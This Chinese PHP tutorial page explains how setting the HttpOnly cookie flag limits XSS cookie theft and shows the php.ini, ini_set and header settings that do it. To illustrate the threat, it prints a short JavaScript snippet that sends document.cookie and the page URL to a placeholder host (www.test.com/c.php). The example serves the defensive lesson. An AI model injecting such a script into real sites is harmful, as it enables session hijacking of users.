编程 PHP

xss防御之php利用httponly防xss攻击

Posted in PHP onMarch 21, 2014

xss的概念就不用多说了，它的危害是极大的，这就意味着一旦你的网站出现xss漏洞，就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持，如果这里面包含了大量敏感信息（身份信息，管理员信息）等，那完了。。。

如下js获取cookie信息：

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是从document对象中获取的，现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数，跟domain等其他参数一样，一旦这个HttpOnly被设置，你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly：

//在php.ini中，session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

对于PHP5.1以前版本的PHP通过：

header("Set-Cookie: hidden=value; httpOnly");

最后，HttpOnly不是万能的！

xss防御之php利用httponly防xss攻击

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

php 静态变量的初始化

Nov 15 PHP

php中 ob_start等函数截取标准输出的方法

Jun 22 PHP

详解PHP中的null合并运算符

Dec 30 PHP

PHP并发多进程处理利器Gearman使用介绍

May 16 PHP

php5.3后静态绑定用法详解

Nov 11 PHP

利用PHP生成CSV文件简单示例

Dec 21 PHP

老生常谈PHP 文件写入和读取(必看篇)

May 22 PHP

php使用flock阻塞写入文件和非阻塞写入文件的实例讲解

Jul 10 PHP

php基于自定义函数记录log日志方法

Jul 21 PHP

PHP实现基于PDO扩展连接PostgreSQL对象关系数据库示例

Mar 31 PHP

Laravel中9个不经常用的小技巧汇总

Apr 16 PHP

Laravel框架下载，安装及路由操作图文详解

Dec 04 PHP

php5.3 goto函数介绍和示例

Mar 21 #PHP

php ctype函数中文翻译和示例

Mar 21 #PHP

php的declare控制符和ticks教程(附示例)

Mar 21 #PHP

php像数组一样存取和修改字符串字符

Mar 21 #PHP

easyui的tabs update正确用法分享

Mar 21 #PHP

php设置session值和cookies的学习示例

Mar 21 #PHP

一个显示效果非常不错的PHP错误、异常处理类

Mar 21 #PHP

You might like

php5数字型字符串加解密代码

2008/04/24 PHP

PHP setTime 设置当前时间的代码

2012/08/27 PHP

php处理文件的小例子(解压缩，删除目录)

2013/02/03 PHP

php中出现空白页的原因及解决方法汇总

2014/07/08 PHP

使用WordPress发送电子邮件的相关PHP函数用法解析

2015/12/15 PHP

Javascript 学习笔记错误处理

2009/07/30 Javascript

基于JQuery 选择器使用说明介绍

2013/04/18 Javascript

js 文本滚动效果的实例代码

2013/08/17 Javascript

javascript实现表格排序编辑拖拽缩放

2015/01/02 Javascript

jQuery实现表格元素动态创建功能

2017/01/09 Javascript

详解react-router4 异步加载路由两种方法

2017/09/12 Javascript

vue+vuex+json-seiver实现数据展示+分页功能

2019/04/11 Javascript

微信小程序class封装http代码实例

2019/08/24 Javascript

layer关闭当前窗口页面以及确认取消按钮的方法

2019/09/09 Javascript

Jquery Fade用法详解

2020/11/06 jQuery

JavaScript 判断浏览器是否是IE

2021/02/19 Javascript

python实现中文输出的两种方法

2015/05/09 Python

python嵌套函数使用外部函数变量的方法(Python2和Python3)

2016/01/31 Python

SQLite3中文编码 Python的实现

2017/01/11 Python

浅谈python迭代器

2017/11/08 Python

python如何压缩新文件到已有ZIP文件

2018/03/14 Python

详解django三种文件下载方式

2018/04/06 Python

Python高级特性切片(Slice)操作详解

2018/09/27 Python

python多线程调用exit无法退出的解决方法

2019/02/18 Python

如何使用selenium和requests组合实现登录页面

2020/02/03 Python

Python 3.8 新功能来一波(大部分人都不知道)

2020/03/11 Python

python利用 keyboard 库记录键盘事件

2020/10/16 Python

Canvas 像素处理之改变透明度的实现代码

2019/01/08 HTML / CSS

英国第一家领先的在线处方眼镜零售商：Glasses Direct

2018/02/23 全球购物

教师找工作推荐信

2013/11/23 职场文书

前台文员个人求职信范文

2014/01/05 职场文书

慰问敬老院活动总结

2014/04/26 职场文书

2014年留守儿童工作总结

2014/12/10 职场文书

2014年电教工作总结

2014/12/19 职场文书

接收函

2019/04/22 职场文书

Python中的变量与常量

2021/11/11 Python